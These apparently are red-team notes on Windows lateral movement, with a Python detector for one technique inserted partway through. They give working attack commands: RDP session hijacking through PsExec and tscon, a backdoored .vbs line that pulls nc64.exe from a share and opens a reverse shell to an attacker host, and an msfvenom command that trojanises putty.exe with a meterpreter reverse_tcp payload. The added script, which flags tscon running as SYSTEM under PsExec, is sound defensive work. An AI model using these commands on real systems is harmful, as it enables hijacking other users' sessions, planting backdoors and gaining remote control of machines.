Abusing User Behaviour
RDP hijacking
Run cmd as administrator
PsExec64.exe -s cmd.exe
query user
tscon <TARGET ID> /dest:<ACTIVE RDP SESSION>
Windows Server < 2019
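Detection side of the sequence above, as an added example that is not part of the original notes: it scans process-creation records for tscon with /dest: running as SYSTEM and reports whether the process descends from a shell started by the PsExec service. The field names follow Sysmon Event ID 1; the sample events, PIDs and the CORP\alice account are constructed for illustration.

```python
import re

# Matches the command shape on this page: tscon <id> /dest:<session name>
TSCON_RE = re.compile(r'(?i)\btscon(?:\.exe)?"?\s+(\S+)\s+/dest:(\S+)')

def _name(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect_session_redirect(events):
    """Alert on tscon /dest: executed as SYSTEM; note PsExec ancestry."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        m = TSCON_RE.search(e["CommandLine"])
        if _name(e["Image"]) != "tscon.exe" or not m:
            continue
        if e["User"].lower() != "nt authority\\system":
            continue  # not SYSTEM context, outside this check
        # Walk up the process tree looking for a shell started by PSEXESVC.exe
        via_psexec, pid, seen = False, e["ParentProcessId"], set()
        while pid in by_pid and pid not in seen:
            seen.add(pid)
            if _name(by_pid[pid]["ParentImage"]) == "psexesvc.exe":
                via_psexec = True
                break
            pid = by_pid[pid]["ParentProcessId"]
        alerts.append({"pid": e["ProcessId"], "target_session": m.group(1),
                       "dest": m.group(2), "via_psexec": via_psexec})
    return alerts

def _ev(pid, ppid, image, parent, cmd, user):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image,
            "ParentImage": parent, "CommandLine": cmd, "User": user}

S32 = "C:\\Windows\\System32\\"
# Constructed sample events (not captured from a real host)
SAMPLE_EVENTS = [
    _ev(4100, 900, S32 + "cmd.exe", "C:\\Windows\\PSEXESVC.exe", "cmd.exe", "NT AUTHORITY\\SYSTEM"),
    _ev(4200, 4100, S32 + "tscon.exe", S32 + "cmd.exe", "tscon 3 /dest:rdp-tcp#6", "NT AUTHORITY\\SYSTEM"),
    _ev(5300, 5000, S32 + "tscon.exe", S32 + "cmd.exe", "tscon 2 /dest:console", "CORP\\alice"),
    _ev(6400, 700, S32 + "tscon.exe", S32 + "services.exe", S32 + "tscon.exe 4 /dest:rdp-tcp#2", "NT AUTHORITY\\SYSTEM"),
]

if __name__ == "__main__":
    for alert in detect_session_redirect(SAMPLE_EVENTS):
        print(alert)
```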
Backdooring
Abusing Writable Shares
Backdoor a regular file that is used from a share
Backdooring .vbs Scripts
CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\10.10.28.6\myshare\nc64.exe %tmp% & %tmp%\nc64.exe -e cmd.exe <attacker_ip> 1234", 0, True
Backdooring .exe Files
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=<attacker_ip> lport=4444 -b "\x00" -f exe -o puttyX.exe